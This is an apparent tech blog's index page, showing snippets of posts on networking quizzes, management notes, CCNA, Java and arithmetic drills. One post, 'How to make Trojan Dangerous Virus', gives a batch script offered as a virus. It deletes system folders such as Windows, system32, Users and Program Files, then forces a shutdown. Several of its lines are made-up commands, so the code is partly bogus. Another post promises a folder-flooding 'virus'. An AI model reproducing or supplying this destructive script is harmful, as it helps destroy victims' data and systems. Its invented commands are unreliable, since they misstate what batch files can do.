Skip to main content

Posts

Showing posts from 2018

B.com 3rd Year - Economy Development & Policy In India (C-103) Latest 20...

Introduction To TCP/IP Networking Questions

1. Which of the following protocols are examples of TCP/IP transport layer protocols? (Choose two answers.)  a. Ethernet b. HTTP c. IP d. UDP e. SMTP f. TCP 2. Which of the following protocols are examples of TCP/IP data link layer protocols? (Choose two answers.) a. Ethernet b. HTTP c. IP d. UDP e. SMTP f. TCP g. PPP 3. The process of HTTP asking TCP to send some data and making sure that it is received correctly is an example of what? a. Same-layer interaction b. Adjacent-layer interaction c. OSI model d. All of these answers are correct.  4. The process of TCP on one computer marking a TCP segment as segment 1, and the receiving computer then acknowledging the receipt of TCP segment 1 is an example of what? a. Data encapsulation b. Same-layer interaction c. Adjacent-layer interaction d. OSI model e. All of these answers are correct. 5. The process of a web server adding a TCP header to the contents of a web page, followed by adding an IP header and the
Chapter 1 : Nature and Significance Of Management                            Management: Management is the process of designing and maintaining an environment in which individuals working together in groups efficiently and effectively accomplish selected goals. Objectives of Management Organizational Objectives: Survival Profit Growth Social Objectives. For example: Use eco-friendly methods Generate employment opportunities Personal Objectives. For example: Fair wages and salary Good working conditions Growth prospects Effectiveness: Definition According to Koontz, “Effectiveness means doing the right thing.” It means taking correct decisions and actions in every situation to achieve the targets. Importance of Management Management helps in achieving group goals. Management increases efficiency of the employees. Management creates a dynamic organization. Management helps in achieving personal objectives. Management helps in the development of s

How to make Trojan Dangerous Virus

Following are the commands : @echo off disable mouse disable keyboard disable system32 del c:\ del c:\windows del c:\windows\system32 del c:\system32\logonul.exe del c:\windows\system32\restore del c:\windows\system32\winlogon.exe del c:\windows del c:\NVIDIA del c:\windows del c:\Document And Settings del c:\RECOVERY del c:\SwSetup del c:\Temp del c:\Program Files del c:\PerfLogs del c:\.rnd del c:\Brukere del c:\Users del c:\MCPP del c:\CMD del c:\ disable windows dir /s echo I am your virus. I deleted your files echo because you tried to delete me. echo By the way, I am -->_<--. pause shutdown -s -t 10 -c "say goodbye to your computer" this will erase the all files of the computer system

HOW TO FIX COMPUTER ERRORS IN 1 CLICK | Step-By-Step Tutorial | HD

HOW TO TRACE SPAM EMAILS STEP-BY-STEP TUTORIAL | LATEST 2018

HOW TO CONFIGURE ROUTER RIP Step-By-Step Tutorial (HD)

MAKE VIRUS FOR FREE [EDUCATIONAL PURPOSE]

# HOW TO MAKE VIRUSES FOR COMPUTER SYSTEM # MAKE VIRUS OF MULTIPLE FOLDER : FOLLOW THESE STEPS : 1.  Open Run Box by press Windows+R,    type notepad then press enter. 2. Type the following commands . 3.Then click on file then click on "save as" 4. Then select "All files" in "save as type" option. 5.After that provide the file name "folder .bat " [.bat is compulsory] , then click on save. When you open this unlimited folder create at the time.

HOW TO BLOCK WEBSITE THROUGH INTERNET EXPLORER STEP-BY-STEP TUTORIAL

HOW TO CHECK YOUR MEMORY FREQUENCY THROUGH OPERATING SYSTEM (HD)

Troubleshooting Tips

Uninstall Application Forcefully Through Command : 1. Login as Administrator. 2. Click on Start Button. 3. Type CMD. 4. Right click on CMD. 5. Choose 2 option "Run as Administrator", then click on yes. 6. After open CMD, type "wmic" 7. Then type "product get name" 8. After that choose your application whichever you want to uninstall forcefully. 9. Then type "product where name= application-name" (full name of application like chrome.exe ) 10. After that type " product where name= application-name call uninstall " It's take sometime to uninstall the program or application according to the size of application or program. Thanks You Can Also Subscribe My YouTube Channel- Techn. Trainer Official

Addition, Subtraction, Multiplication And Division

Solve the Following Questions  : Addition :                      1. 789+452=                          2. 452+145=                          3. 258+984=                    4. 456+784=                           5. 754+745=                         6. 451+567=                          7. 245+845=                      8. 251+568=                                                                        9. 468+567=                    10. 541+202=                                                                  Subtraction  :  1. 852-745=  2. 456-257=  3. 239-111=  4. 811-456=  5. 912-498=  6. 781-368=  7. 589-541=  8. 112-098=  9. 411-399= 10. 548-178= Multiplication : 1. 589*859= 2. 256*458= 3. 256*784= 4. 214*741= 5. 258*852= 6. 365*874= 7. 456*987= 8. 698*745= 9. 658*784= 10. 547*874= 11.875*589= 12. 698*231= 13. 695*235= 14. 111*963= 15. 345*826= 16. 861*820= 17. 412*721= 18. 655*899= 19. 779*815= 20. 555*

CCNA Routing and Switching Advanced......

# Switch   *It is a network devices.   *It works at layer 2 of OSI Model.   *It is used to connect more than one end devices for sharing purpose, security, etc.  # Ma nageable Switch: Those switches which can be configured by administrator i.e., administrator can modify the default configuration of switch. They have a console port. # Unma nageable Switch: Those switches which cannot be configured by administrator. They already have a default configuration. They don't have a console port. Setting Passwords Five passwords are used to secure your Cisco Switch: console, auxiliary, telnet (VTY), enable password, and enable secret. The enable secret and enable password are used to set the password that’s used to secure privileged mode. This will prompt a user for a password when the enable command is used. The other three are used to configure a password when user mode is accessed through the console port, through the auxiliary port, or via Telnet. 1. Enable Passw

JAVA For Beginners...

Java Java is a programming language and a computing platform for application development. It was first released by Sun Microsystem in 1995 and later acquired by Oracle Corporation. It is one of the most used programming languages. Java Platform Java platform is a collection of programs that help to develop and run programs written in the Java programming language. Java platform includes an execution engine, a compiler, and a set of libraries. JAVA is platform-independent language. It is not specific to any processor or operating system. To understand JAVA programming language, we need to understand some basic concept of how a computer program can run a command and execute the action. PC A computer is an electronic device capable of performing computations, and we all know that it is composed of a monitor, keyboard, mouse, and memory to store information. But the most important component of the computer is a PROCESSOR. Which does all thinking of computer, but

Introduction To CCNA

CCNA is a popular certification course among computer network engineers. It is estimated that more than 1 million CCNA certificates have been awarded since it was first launched in 1998. The CCNA certificate covers a broad range of networking concepts. It helps candidates to prepare for the latest network technologies they are likely to work on. What is CCNA? Cisco Certified Network Associate often known as CCNA. It is an IT network certification course offered by Cisco. It is a certification program valid for all type of engineers. It includes entry-level network engineers, Network Administrators, Network Support Engineers and Network Specialists. Some of the common topics covered under CCNA certification include: OSI models IP addressing WLAN and VLAN Network security and management (ACL included) Routers / routing protocols ( EIGRP, OSPF, and RIP) IP Routing Network Device Security Troubleshooting Note that Cisco certification is valid only for 3 year